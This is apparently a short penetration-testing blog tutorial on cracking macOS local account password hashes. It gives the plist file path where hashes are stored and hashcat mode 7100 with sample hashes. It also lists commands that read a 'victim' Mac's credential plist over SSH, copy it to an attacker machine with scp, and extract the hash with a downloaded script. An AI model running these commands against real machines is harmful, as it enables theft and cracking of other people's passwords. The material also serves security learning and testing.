How do we crack OS X password hashes?
I haven’t had tea but I was thinking about the MAC i was remoting into and I suddenly thought.. I wonder how to crack the hashes from a MAC. Surely it’s just cat /etc/passwd and cat /etc/shadow and then unshadow and run hashcat right?
The hashes for local users are stored here:
There is a .plist file per [usernanme] e.g for user: “user” we would do the following:
sudo cat /var/db/dslocal/nodes/Default/users/user.plist
The file format is XML and is a “Property List” file type:
We need to extract the hash, there are two tools for this:
hashcat mode: 7100
macOS v10.8+ (PBKDF2-SHA512)
Example hash: $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222
If you want to follow along but you don’t have a mac, don’t worry:
#From SSH on the victim sudo cat /var/db/dslocal/nodes/Default/users/user.plist cp /var/db/dslocal/nodes/Default/users/user.plist /Users/user/Desktop/user.plist chown -R user:staff user.plist #Fom Attacker KALI/Linux/whatever machine scp [email protected]:/Users/user/Desktop/user.plist ./ wget https://gist.githubusercontent.com/nueh/8252572/raw/1c5992fccf093dcce13572c6980176864edaf816/plist2hashcat.py chmod +x plist2hashcat.py python2 ./plist2hashcat.py user.plist user:$ml$73529$7331440ead78f9e9567de0f4be67558615e8e1dc3b40d9ac30a0fc26c5dd1d26$2fc1cde58115106f369d44d06ff9f8bd91c4d487bd382d6d110e18a2ab217bd4150ff26d12148ae43fbe04cc7cb67434afad454c4134c7db68e0d0f7c8519bf8